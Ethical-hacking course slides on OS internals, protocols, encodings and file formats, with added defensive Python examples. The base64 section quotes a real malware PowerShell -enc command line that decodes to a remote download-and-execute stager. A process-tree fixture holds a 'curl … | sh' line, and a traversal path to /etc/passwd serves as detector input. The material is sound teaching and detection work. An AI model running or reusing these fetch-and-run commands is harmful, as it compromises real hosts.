Ethical Hacking
Introduction – part 2
Course Info
OS
Windows / Linux
Process / Privilege Rings
Permissions / Owners
OSI Model
TCP/IP
Application
HTTP/S
Methods, Headers
TLS Handshake
Encoding
Base64, UTF, URL, GZip
Data format
Header, Magic Number
XML, JSON
DOCX
Metadata
EXIF, Email Header, HTTP Header
iNode, MFT
Desktops
Servers
Windows
Key Terms
NT version (10.0)
RTM Build number (14393)
Architecture (x64 = x86_64)
C:\Users\user>systeminfo
Host Name: DESKTOP-Win10
OS Name: Microsoft Windows 10
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
Original Install Date: 12/28/2020, 2:30:36 AM
System Boot Time: 1/4/2021, 11:42:23 PM
System Model: VirtualBox
System Type: x64-based PC
The same information is stored in the registry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ (values such as ProductName, CurrentBuild and UBR)
Windows
OS           Arch  Build            Date        PDB       Volatility profile
10           x64   10.0.10586.306   2016-04-23  1AC738FB  Win10x64_10586
10           x64   10.0.14393.0     2016-07-16  DD08DD42  Win10x64_14393 (Anniversary)
10           x64   10.0.15063.0     2017-04-04  -         Win10x64_15063 (Creators)
10           x86   10.0.10586.420   2016-05-28  44B89EEA  Win10x86_10586
10           x86   10.0.14393.0     2016-07-16  9619274A  Win10x86_14393 (Anniversary)
10           x86   10.0.15063.0     2017-04-04  -         Win10x86_15063 (Creators)
2008 R2 SP1  x64   6.1.7601.23418   2016-04-09  632B36E0  Win2008R2SP1x64_23418
2012 R2      x64   6.3.9600.18340   2016-05-13  54B5A1C6  Win2012R2x64_18340
7 SP1        x64   6.1.7601.23418   2016-04-09  632B36E0  Win7SP1x64_23418
7 SP1        x86   6.1.7601.23418   2016-04-09  BBA98F40  Win7SP1x86_23418
7 SP1        x64   6.1.7601.24000   2018-01-09  -         Win7SP1x64_24000
7 SP1        x86   6.1.7601.24000   2018-01-09  -         Win7SP1x86_24000
8.1          x64   6.3.9600.18340   2016-05-13  54B5A1C6  Win8SP1x64_18340
List of Volatility (2.x) memory profiles for Windows; PDB is the kernel symbol identifier that ties a dump to the right profile (a "-" means the slide did not list one)
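The table above is only useful once you can map what a host reports to a profile name. The following is an added example, not part of the original slides or of Volatility itself: it parses the systeminfo output shown earlier (reproduced here as a constructed sample), extracts the NT version, build and architecture, and looks up the matching profile(s) from the table. The PROFILES dictionary is transcribed from the table; where several profiles share a build (7601, 9600) systeminfo does not print the revision that would tell them apart, so every candidate is returned.

```python
import re

# Constructed sample: the systeminfo output reproduced on the slide.
SYSTEMINFO_SAMPLE = """\
Host Name:                 DESKTOP-Win10
OS Name:                   Microsoft Windows 10
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
System Model:              VirtualBox
System Type:               x64-based PC
"""

# (major.minor.build, arch) -> Volatility 2 profile names, transcribed from the table.
# Builds shared by several profiles need the revision (UBR) to disambiguate, which
# systeminfo does not print, so all candidates are listed.
PROFILES = {
    ("10.0.10586", "x64"): ["Win10x64_10586"],
    ("10.0.14393", "x64"): ["Win10x64_14393"],
    ("10.0.15063", "x64"): ["Win10x64_15063"],
    ("10.0.10586", "x86"): ["Win10x86_10586"],
    ("10.0.14393", "x86"): ["Win10x86_14393"],
    ("10.0.15063", "x86"): ["Win10x86_15063"],
    ("6.1.7601", "x64"): ["Win7SP1x64_23418", "Win7SP1x64_24000", "Win2008R2SP1x64_23418"],
    ("6.1.7601", "x86"): ["Win7SP1x86_23418", "Win7SP1x86_24000"],
    ("6.3.9600", "x64"): ["Win8SP1x64_18340", "Win2012R2x64_18340"],
}


def parse_systeminfo(text: str) -> dict:
    """Turn 'Key: value' lines from systeminfo into a dict (first colon splits key/value)."""
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields


def os_version(fields: dict) -> tuple:
    """Return ('major.minor.build', 'x64'|'x86') from the parsed fields."""
    m = re.match(r"(\d+\.\d+\.\d+)", fields.get("OS Version", ""))
    if not m:
        raise ValueError("no usable 'OS Version' field")
    arch = "x64" if fields.get("System Type", "").lower().startswith("x64") else "x86"
    return m.group(1), arch


def candidate_profiles(text: str) -> list:
    """Profiles from the table that match this systeminfo output (empty if unknown build)."""
    return PROFILES.get(os_version(parse_systeminfo(text)), [])


if __name__ == "__main__":
    print(os_version(parse_systeminfo(SYSTEMINFO_SAMPLE)), candidate_profiles(SYSTEMINFO_SAMPLE))
```

On a live host the same three facts come from the CurrentVersion registry key instead of systeminfo. Volatility 3 no longer uses these profile names; it resolves symbols from the PDB identifier in the dump itself.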
Linux
Current Linux kernels
Linux 5.10 is the current release (an LTS kernel) as of early 2021
Linux 4.19 LTS is supported until 2024
Two support models
LTS – long-term support, for stable releases and flagship products
Windows 10 – 10 years
Ubuntu – 5 years
Linux kernel – 6 years+
macOS – 3 years
Debian – 2 years / RHEL – 5.5 + 3.5 years
STS – short-term support, feature releases
Linux Distribution Timeline
Linux Kernel map
Process
UID PID PPID C STIME TTY TIME CMD
501 2701 2695 0 4:00PM ttys000 0:00.10 -zsh
501 3595 2701 0 6:41PM ttys000 0:13.68 curl https://az792536.vo.msecnd.net/vms/VMBuild_20190311/VMware/MSEdge/MSEdge.Win10.VMware.zip -o MSEdge.Win10.VMWare.zip
One of the key elements of an OS
Attributes:
PID: process ID
PPID: parent process ID
Owner / user
Binary path
Process name
Command line
Start time
See the SANS "Find Evil" DFIR poster for the expected name, parent, instance count and user of each core Windows process
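The attributes above are what a process-tree check works from: given PID, PPID and command line you can reconstruct who started what and flag parent/child pairs that should never occur. The block below is an added example (not from the slides or the SANS poster): it parses ps -ef style output, reproduced as a constructed sample containing the slide's zsh and curl lines plus a web-server worker that has spawned a shell, builds the tree, and applies one "know normal, find evil" heuristic on Unix: a shell whose parent is a network service. The SHELLS and SERVICE_PARENTS sets and the 203.0.113.10 URL are assumptions made for the example.

```python
# Constructed sample in `ps -ef` layout (UID PID PPID C STIME TTY TIME CMD).
PS_SAMPLE = """\
UID   PID  PPID   C STIME   TTY         TIME CMD
  0     1     0   0 9:00AM  ??       0:01.00 /sbin/launchd
501  2695     1   0 3:59PM  ??       0:00.50 /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
501  2701  2695   0 4:00PM  ttys000  0:00.10 -zsh
501  3595  2701   0 6:41PM  ttys000  0:13.68 curl https://az792536.vo.msecnd.net/vms/VMBuild_20190311/VMware/MSEdge/MSEdge.Win10.VMware.zip -o MSEdge.Win10.VMWare.zip
 33  1200     1   0 9:01AM  ??       0:02.00 nginx: worker process
 33  4200  1200   0 6:50PM  ??       0:00.05 sh -c curl http://203.0.113.10/x.sh | sh
"""

# Heuristic tables (assumptions for this example): interactive shells, and daemons
# that have no business spawning one.
SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}
SERVICE_PARENTS = {"nginx", "httpd", "apache2", "php-fpm", "java", "tomcat"}


def parse_ps(text: str) -> dict:
    """Map PID -> record. The command line is the 8th column and may contain spaces."""
    procs = {}
    for line in text.strip().splitlines()[1:]:          # skip the header row
        uid, pid, ppid, _c, stime, _tty, _time, cmd = line.split(None, 7)
        procs[int(pid)] = {"uid": int(uid), "pid": int(pid), "ppid": int(ppid),
                           "start": stime, "cmd": cmd}
    return procs


def process_name(cmd: str) -> str:
    """Basename of argv[0]; strip the login-shell '-' prefix and nginx-style ':' suffix."""
    return cmd.split()[0].rsplit("/", 1)[-1].lstrip("-").rstrip(":")


def ancestry(procs: dict, pid: int) -> list:
    """Process names from pid up to the root (stops when a PPID is not in the listing)."""
    chain = []
    while pid in procs:
        chain.append(process_name(procs[pid]["cmd"]))
        pid = procs[pid]["ppid"]
    return chain


def find_suspicious(procs: dict) -> list:
    """Shells whose parent is a network service: (pid, name, parent name, command line)."""
    hits = []
    for pid, p in procs.items():
        name = process_name(p["cmd"])
        parent = procs.get(p["ppid"])
        if name in SHELLS and parent and process_name(parent["cmd"]) in SERVICE_PARENTS:
            hits.append((pid, name, process_name(parent["cmd"]), p["cmd"]))
    return hits


if __name__ == "__main__":
    tree = parse_ps(PS_SAMPLE)
    print(" <- ".join(ancestry(tree, 3595)))
    for hit in find_suspicious(tree):
        print("SUSPICIOUS:", hit)
```

The Windows equivalent replaces the two sets with the poster's parent rules (for example lsass.exe and services.exe are children of wininit.exe, svchost.exe of services.exe) and adds instance-count checks; the tree-building code is the same.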
Privilege Rings
Defined by a data-security model: inner rings have higher privilege
Protect confidentiality (read) and integrity (write) of data held by inner rings
Most OSes use only two of the four x86 rings
Ring 0 – kernel mode
Ring 3 – user mode (admin and regular user alike; admin is a user-mode privilege, not a ring)
Some applications add their own sandboxing on top of the ring model
IE in Protected Mode can only write to the LocalLow directory
WriteFile() call chain
User space:
Application calls WriteFile() in Kernel32.dll
Which calls NtWriteFile() in ntdll.dll
ntdll issues the SYSCALL (transition from user mode to kernel mode)
Kernel space:
NtWriteFile() in Ntoskrnl.exe is invoked
Which calls the I/O Manager
Which dispatches to the kernel-mode (file system / storage) driver that serves the I/O Manager
Which calls the HAL (Hal.dll) to reach the abstracted hardware devices
Actual data written to hardware
Return travels in the reverse direction back to the user application
LSASS (Local Security Authority Subsystem Service)
One of the core Windows processes (lsass.exe)
Holds user credentials in memory, which makes it a prime target for credential dumping
Responsible for authentication (local logon, NTLM, Kerberos)
Enforces local security policy (password complexity / expiry)
Integrates with Active Directory (on a domain controller it hosts the directory service)
Logs to the Security event log
Permissions (Unix)
Shown as 4 fields in ls -l
D – file type (d = directory, - = regular file, l = symlink)
U – user (the file owner)
G – group (members of the file's group)
O – others (everyone else)
Permission bits for each class
R = 4, W = 2, X = 1 (summed per class into one octal digit)
Typical permission examples
777 = rwx for everyone; a red flag, commonly seen on dropped malware
640 = regular non-executable file, readable by the group
400 = typically private keys (owner read only)
644 = default for new files on Ubuntu (0666 masked by umask 022)
% ssh -i mykey.key root@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for ‘mykey.key’ are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key “mykey.key”: bad permissions
Another symptom of a permission problem: editing a file you cannot write to in vim gives E45: 'readonly' option is set (add ! to override)
OSI Models – 7 Layers
HTTP
F12
HTTP Request
HTTP POST
TLS Handshake
Versions
SSL 1.0, 2.0, 3.0 (deprecated, no longer in use)
TLS 1.0, 1.1, 1.2, 1.3
TLS 1.2 is the mainstream version; TLS 1.3 (RFC 8446) is the current standard
Authentication
Typically ONE WAY
Client verifies the server only (mutual TLS adds a client certificate)
Validates the certificate chain against trusted CAs
Negotiates a cipher suite
Exchanges / derives session keys
Encoding – Movie
The Art of Code – Dylan Beattie
DNA: The Code of Life (SHA2017)
https://www.youtube.com/watch?v=EcGM_cNzQmE
Encoding – base64
Addresses channels that are not 8-bit clean (e-mail and other text protocols)
Especially the lower part of the ASCII table (control characters such as 0x00)
Projects the full byte space onto a 64-character subset of printable ASCII
2^8 = 256 values -> 2^6 = 64 symbols, so every 3 bytes become 4 characters (33% overhead)
Base64 character space:
A-Z (26)
a-z (26)
0-9 (10)
+/ (2)
Total length is always a multiple of 4
Uses = or == for padding when the input is not a multiple of 3 bytes
Encoding – base64
Inline image example (data: URI), taken from Wikipedia
Encoding – base64
Email example
Attachment encoded in base64
The MIME headers carry metadata about the base64 payload:
Content-Type
Size
Content-Transfer-Encoding
Last-modified date
The line beginning –_004_HK is the MIME boundary that separates the message parts
Encoding – base64
Malware example: PowerShell -enc (-EncodedCommand) takes the base64 of a UTF-16LE encoded script, so decoding as ASCII shows every other byte as NUL
https://app.any.run/tasks/e9d31e2a-3858-44c7-a921-92499d624178/
“C:\Windows\System32\cmd.exe” /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMwA0AC4AMgAxADcALgAxADMAOQAvAHYAZQByAGMAaABlAGMAawAuAHAAcwAxACcAKQApAAoA
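To make the 3-bytes-to-4-characters mapping and the padding rule concrete, and to decode the -enc payload above, here is an added example (not from the slides, the any.run report or PowerShell itself). The encoder is written from scratch against the 64-symbol alphabet listed earlier and checked against the standard library; the decoder extracts the -enc argument from the command line shown on the slide and decodes it as UTF-16LE. The regular expression accepting any prefix of EncodedCommand is an assumption that matches how powershell.exe resolves abbreviated switches (-e, -ec, -enc).

```python
import base64
import re
import string

ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def b64encode_manual(data: bytes) -> str:
    """3 input bytes (24 bits) -> 4 symbols of 6 bits; '=' pads a short final group."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        pad = 3 - len(chunk)                       # 0, 1 or 2 bytes missing
        n = int.from_bytes(chunk + b"\x00" * pad, "big")
        symbols = [ALPHABET[(n >> shift) & 0x3F] for shift in (18, 12, 6, 0)]
        if pad:
            symbols[4 - pad:] = ["="] * pad        # 1 missing byte -> "=", 2 -> "=="
        out.append("".join(symbols))
    return "".join(out)


def matches_stdlib(data: bytes) -> bool:
    """Cross-check the hand-rolled encoder against base64.b64encode."""
    return b64encode_manual(data) == base64.b64encode(data).decode("ascii")


def decode_powershell_enc(cmdline: str):
    """Return the script hidden behind -e/-ec/-enc/-EncodedCommand, or None.
    The argument is base64 of a UTF-16LE string, not of ASCII/UTF-8."""
    for m in re.finditer(r"-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)", cmdline):
        flag, arg = m.group(1).lower(), m.group(2)
        if flag.startswith("e") and "encodedcommand".startswith(flag):
            return base64.b64decode(arg).decode("utf-16-le")
    return None


# Command line from the slide (the any.run sample).
MALWARE_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c powershell.exe -nop -noni -w hidden -enc '
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMwA0AC4AMgAxADcALgAxADMAOQAvAHYAZQByAGMAaABlAGMAawAuAHAAcwAxACcAKQApAAoA"
)

if __name__ == "__main__":
    for sample in (b"Man", b"Ma", b"M"):
        print(sample, b64encode_manual(sample))
    print(decode_powershell_enc(MALWARE_CMDLINE))
```

Decoding shows an IEX of a downloadstring() call against the IP on the slide: a stage-one downloader, which is why base64-looking arguments to powershell.exe deserve a detection rule of their own.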
Encoding – UTF
ASCII (7-bit, 128 code points; even a full byte only gives 256) is not sufficient to fit all languages
UTF-8 is capable of encoding all 1,112,064 valid character code points in Unicode using one to four one-byte (8-bit) code units
As of January 2021, UTF-8 accounts for on average 96.1% of all web pages and 96.3% of the top 1,000 highest ranked web pages
Encoding – URL
A URL must fit within a subset of ASCII, so any other byte is normalized by percent-encoding (%XX)
Only unreserved printable characters are allowed literally
Further reading
Uniform Resource Identifier (URI) RFC 2396 (obsoleted by RFC 3986)
Regular expressions (regex)
Decoding ambiguities open the door to web attacks
Escaped encoding (e.g. %00 for NUL)
Unicode encoding / double encoding (%252e -> %2e -> .)
A dot (.) can be written in 6 ways; only the first is valid UTF-8, the rest are overlong encodings that a strict decoder must reject
2E (00101110)
C0 AE (11000000 10101110)
E0 80 AE (11100000 10000000 10101110)
F0 80 80 AE (11110000 10000000 10000000 10101110)
F8 80 80 80 AE (11111000 10000000 10000000 10000000 10101110)
FC 80 80 80 80 AE (11111100 10000000 10000000 10000000 10000000 10101110)
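The six byte sequences above only collapse to a dot if the decoder is lenient. The block below is an added example (not from the slides): a deliberately naive UTF-8 decoder that checks lead-byte length and continuation bits but not shortest form, which is exactly the behaviour that turned %c0%ae into "." in historical traversal bugs; Python's own strict codec for comparison; and a percent-decoder that keeps decoding until the value stops changing, so double-encoded input (%252e) is caught too. The traversal check and the sample paths are constructed for this example.

```python
import urllib.parse

# The six encodings of '.' listed on the slide; only the first is valid UTF-8.
DOT_ENCODINGS = [
    b"\x2e",
    b"\xc0\xae",
    b"\xe0\x80\xae",
    b"\xf0\x80\x80\xae",
    b"\xf8\x80\x80\x80\xae",
    b"\xfc\x80\x80\x80\x80\xae",
]


def naive_utf8_decode(data: bytes) -> str:
    """Lenient decoder: honours the length prefix and 10xxxxxx continuation bytes but
    never checks that the shortest form was used, so overlong and the obsolete
    5/6-byte forms are accepted (chr() still rejects code points above U+10FFFF)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            n, cp = 1, b
        elif b >> 5 == 0b110:
            n, cp = 2, b & 0x1F
        elif b >> 4 == 0b1110:
            n, cp = 3, b & 0x0F
        elif b >> 3 == 0b11110:
            n, cp = 4, b & 0x07
        elif b >> 2 == 0b111110:
            n, cp = 5, b & 0x03
        elif b >> 1 == 0b1111110:
            n, cp = 6, b & 0x01
        else:
            raise ValueError(f"invalid lead byte {b:#04x} at offset {i}")
        if i + n > len(data):
            raise ValueError("truncated multi-byte sequence")
        for c in data[i + 1:i + n]:
            if c >> 6 != 0b10:
                raise ValueError(f"bad continuation byte {c:#04x}")
            cp = (cp << 6) | (c & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)


def strict_utf8_decode(data: bytes) -> str:
    """Python's codec enforces shortest form and rejects C0/C1 and F8-FF lead bytes."""
    return data.decode("utf-8")


def is_overlong(data: bytes) -> bool:
    """True when the strict decoder rejects input that the naive one accepts."""
    try:
        strict_utf8_decode(data)
        return False
    except UnicodeDecodeError:
        try:
            naive_utf8_decode(data)
            return True
        except ValueError:
            return False


def percent_decode_fully(path: str, max_rounds: int = 3) -> bytes:
    """Undo repeated percent-encoding (double encoding) until the value is stable."""
    cur = path.encode("utf-8")
    for _ in range(max_rounds):
        nxt = urllib.parse.unquote_to_bytes(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def looks_like_traversal(path: str) -> bool:
    """Canonicalise the way a lenient server would, then look for '..' segments."""
    text = naive_utf8_decode(percent_decode_fully(path))
    return ".." in text.replace("\\", "/").split("/")


if __name__ == "__main__":
    for enc in DOT_ENCODINGS:
        print(enc.hex(), repr(naive_utf8_decode(enc)), "overlong" if is_overlong(enc) else "valid")
    print(looks_like_traversal("/cgi/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"))
```

The defensive lesson is the ordering: decode and canonicalise first (strictly), then apply the security check, and never let two components decode the same input a different number of times.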
Encoding – GZIP
gzip is the common Content-Encoding for HTTP
Achieves a high compression ratio on text-based content
Adopted early, when first-generation internet links were slow, and kept ever since
Base64 is not needed on top: HTTP is 8-bit clean, so the compressed bytes are sent as-is
Compression can also be abused to transform (obfuscate) data in a payload
Encoding – GZip
Wireshark:
Frame – the size of the current (last) packet
Reassembled TCP – the HTTP response was reassembled from 3 TCP segments
Content-Length: 2476 – total size of the entity body after gzip compression
Uncompressed entity body – the payload after Wireshark inflates it (HTML)
You lose this visibility when the traffic is HTTPS
Use the Burp Suite proxy to intercept and decrypt
Use the browser's F12 developer tools
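What Wireshark does in the screenshot (read the headers, compare Content-Length with the bytes on the wire, inflate the body) is straightforward to reproduce. The block below is an added example, not from the slides or from Wireshark: it builds a gzip-compressed HTTP/1.1 response for a constructed HTML body, then parses it back, checking that the declared Content-Length matches the compressed body, that a body declared as gzip really starts with the 1f 8b magic, and returning the inflated entity.

```python
import gzip

# Constructed, deliberately repetitive HTML so the compression ratio is visible.
SAMPLE_HTML = b"<html><body>" + b"<p>hello world</p>" * 50 + b"</body></html>"


def build_gzip_response(html: bytes) -> bytes:
    """Serialise a minimal HTTP/1.1 200 response with a gzip-compressed entity body."""
    body = gzip.compress(html, mtime=0)             # mtime=0 keeps the bytes deterministic
    head = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "Content-Encoding: gzip\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    ).encode("ascii")
    return head + body


def parse_response(raw: bytes) -> dict:
    """Split headers from body, validate Content-Length, inflate if Content-Encoding is gzip."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()    # header names are case-insensitive

    declared = int(headers.get("content-length", len(body)))
    if declared != len(body):
        raise ValueError(f"Content-Length {declared} but {len(body)} body bytes present")

    encoding = headers.get("content-encoding", "identity").lower()
    if encoding == "gzip":
        if body[:2] != b"\x1f\x8b":
            raise ValueError("Content-Encoding says gzip but magic 1f 8b is missing")
        entity = gzip.decompress(body)
    elif encoding == "identity":
        entity = body
    else:
        raise ValueError(f"unsupported Content-Encoding {encoding!r}")

    return {"status": status, "headers": headers,
            "compressed_len": len(body), "entity": entity}


if __name__ == "__main__":
    r = parse_response(build_gzip_response(SAMPLE_HTML))
    print(r["status"], r["compressed_len"], "->", len(r["entity"]), "bytes")
```

Two things carry over to analysis: Content-Length always counts the bytes after encoding, so a small value can hide a much larger document, and the magic check catches payloads that lie about their encoding to slip past inspection.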
Magic Number
GUI desktop – file-extension driven
The file extension tells the desktop which application handles a file (GUI desktop)
Windows – Registry (HKEY_CLASSES_ROOT / HKEY_CURRENT_USER\Software\Classes)
Mac – plist (~/Library/Preferences/com.apple.LaunchServices.plist)
Linux – varies by distro and desktop (GNOME, KDE)
Command-line environment – executing-program driven
Typically a binary / script followed by optional parameters
File names are passed via parameters / a config file; the program itself decides how to read the content
Magic Number
Typically at the very beginning of the file
Equivalent to a protocol ID in the OSI stack that signals the structure of the upper-layer data
Helps an application identify the type and version of the file payload regardless of its extension
Header / Magic Number
$ file vlc-3.0.8.dmg
vlc-3.0.8.dmg: bzip2 compressed data, block size = 100k
$ hexdump -C vlc-3.0.8.dmg | head -n 5
00000000 42 5a 68 31 31 41 59 26 53 59 6a 29 d3 1a 00 00 |BZh11AY&SYj)….|
$ hexdump -C EH-20.pptx | more
00000000 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d2 aa |PK……….!…|
$ file EH-20.pptx
EH-20.pptx: Microsoft PowerPoint 2007+
XML
Extensible Markup Language (XML)
markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable
XPath (XML Path Language)
To Query XML objects
XML / HTML
XML
Declares its version/encoding (<?xml ... ?>) and optional schema (DOCTYPE / XSD) at the beginning of the file
HTML
Declares its document type (DOCTYPE) and language at the beginning
Can also be defined at
JSON
{
  "firstName": "Jonathan",
  "lastName": "Freeman",
  "loginCount": 4,
  "isWriter": true,
  "worksWith": ["AA Group", "InfoWorld"],
  "pets": [
    {
      "name": "Lilly",
      "type": "Raccoon"
    }
  ]
}
JavaScript Object Notation
JSON grew out of the need for a stateless, real-time server-to-browser communication format that did not rely on browser plugins such as Flash or Java applets, the dominant methods in the early 2000s
Often loosely referred to as "unstructured data" (more precisely semi-structured: self-describing, with no fixed schema)
Values are one of:
Number
String
Boolean
Array
Object
null
YAML
YAML = "YAML Ain't Markup Language"
(a recursive acronym, like GNU = GNU's Not Unix!)
Uses indentation for nesting and - for list items
Supports comments (#)
Supports the same value types as JSON (YAML 1.2 is a superset of JSON)
Structured Data vs Unstructured Data
You may convert between these formats
XML, JSON, YAML
May convert to CSV (less practical for nested data)
These are syntax-defined data structures
They support dynamic data without a schema
They fit well for small amounts of data, or large data with complex type sets
Often associated with NoSQL stores
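To show XPath on the XML side and the type difference on the JSON side, here is an added example (not from the slides): the writer record above expressed both as JSON and as a constructed XML document, two XPath queries with the standard-library ElementTree (which supports a subset of XPath, including the [child='text'] predicate), and a converter that turns the XML into the same Python structure json.loads produces. The conversion has to cast loginCount and isWriter explicitly because XML carries only text, which is the practical meaning of "JSON is typed, XML is not".

```python
import json
import xml.etree.ElementTree as ET

# The slide's JSON record (straight quotes, as real JSON requires).
JSON_SAMPLE = """{
  "firstName": "Jonathan", "lastName": "Freeman", "loginCount": 4, "isWriter": true,
  "worksWith": ["AA Group", "InfoWorld"],
  "pets": [{"name": "Lilly", "type": "Raccoon"}]
}"""

# Constructed XML equivalent of the same record.
XML_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<writer>
  <firstName>Jonathan</firstName>
  <lastName>Freeman</lastName>
  <loginCount>4</loginCount>
  <isWriter>true</isWriter>
  <worksWith><org>AA Group</org><org>InfoWorld</org></worksWith>
  <pets>
    <pet><name>Lilly</name><type>Raccoon</type></pet>
  </pets>
</writer>
"""


def xpath_text(xml_bytes: bytes, expr: str) -> list:
    """Text of every element matched by an ElementTree XPath expression."""
    root = ET.fromstring(xml_bytes)
    return [e.text for e in root.findall(expr)]


def xml_to_record(xml_bytes: bytes) -> dict:
    """Rebuild the JSON-shaped record; every leaf arrives as text and must be cast."""
    root = ET.fromstring(xml_bytes)
    return {
        "firstName": root.findtext("firstName"),
        "lastName": root.findtext("lastName"),
        "loginCount": int(root.findtext("loginCount")),
        "isWriter": root.findtext("isWriter") == "true",
        "worksWith": [o.text for o in root.findall("worksWith/org")],
        "pets": [{"name": p.findtext("name"), "type": p.findtext("type")}
                 for p in root.findall("pets/pet")],
    }


def same_record(xml_bytes: bytes, json_text: str) -> bool:
    """True when both serialisations describe the same typed structure."""
    return xml_to_record(xml_bytes) == json.loads(json_text)


if __name__ == "__main__":
    print(xpath_text(XML_SAMPLE, ".//pet[type='Raccoon']/name"))
    print(xpath_text(XML_SAMPLE, "worksWith/org"))
    print(same_record(XML_SAMPLE, JSON_SAMPLE))
```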
Content of Office files (XML based: an OOXML document is a ZIP package of XML parts)
You don't need Microsoft Office to extract elements of a document
Macro (stored as vbaProject.bin inside the package)
Media
Older document files are binary
Content of Office 2003 or earlier files (OLE2 compound document, the format before OOXML)
Extract with oledump.py from an Excel file [reverse engineering]
Internally a .bin (compound document file); the vbaProject.bin inside an OOXML package uses the same format
The macro is stored under the name vbaProject.bin
/docProps/thumbnail.jpeg
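The two hexdumps earlier (BZh for bzip2, PK for a zip that turned out to be a PowerPoint file) and the OOXML layout just described come together in one workflow: sniff the magic bytes, and if it is a zip with a [Content_Types].xml part, open it as an Office package and look for vbaProject.bin and media. The block below is an added example, not from the slides or from oledump: it builds a minimal, constructed .docx-like package in memory (not real Word output) with and without a macro part, identifies it by magic rather than by extension, and reports the parts, the document text and whether a macro container is present. The MAGIC table holds a handful of well-known signatures.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Well-known signatures at offset 0.
MAGIC = [
    (b"PK\x03\x04", "zip (also DOCX/XLSX/PPTX, JAR, APK)"),
    (b"BZh", "bzip2"),
    (b"\x1f\x8b", "gzip"),
    (b"MZ", "Windows PE executable"),
    (b"\x7fELF", "ELF executable"),
    (b"%PDF", "PDF"),
    (b"\xff\xd8\xff", "JPEG"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound document"),
]
W_NS = {"w": "http://schemas.openxmlformats.org/wordprocessingml/2006/main"}


def sniff(data: bytes) -> str:
    """Identify a file by its leading bytes, ignoring whatever extension it carries."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"


def build_docx(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package (just enough parts to exercise the inspector)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="%s"><w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>'
                   '</w:body></w:document>' % W_NS["w"])
        z.writestr("docProps/thumbnail.jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)   # fake JPEG stub
        if with_macro:
            # A real vbaProject.bin is itself an OLE2 compound file; only its header is mimicked here.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


def inspect_ooxml(data: bytes) -> dict:
    """List parts, pull the document text, and flag a macro container, without Office installed."""
    if not data.startswith(b"PK\x03\x04"):
        raise ValueError(f"not a zip container (sniffed as {sniff(data)})")
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "[Content_Types].xml" not in names:
            raise ValueError("zip archive, but not an OOXML package")
        macro_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        media = [n for n in names if "/media/" in n or n.startswith("docProps/thumbnail")]
        text = []
        if "word/document.xml" in names:
            root = ET.fromstring(z.read("word/document.xml"))
            text = [t.text for t in root.iterfind(".//w:t", W_NS)]
        macro_container = sniff(z.read(macro_parts[0])) if macro_parts else None
    return {"parts": names, "has_macro": bool(macro_parts),
            "macro_container": macro_container, "media": media, "text": text}


if __name__ == "__main__":
    for flag in (False, True):
        pkg = build_docx(flag)
        print(sniff(pkg), inspect_ooxml(pkg))
```

On a real file the vbaProject.bin part is what you hand to oledump.py; the text extraction here is the same idea as reading word/document.xml by hand, just automated.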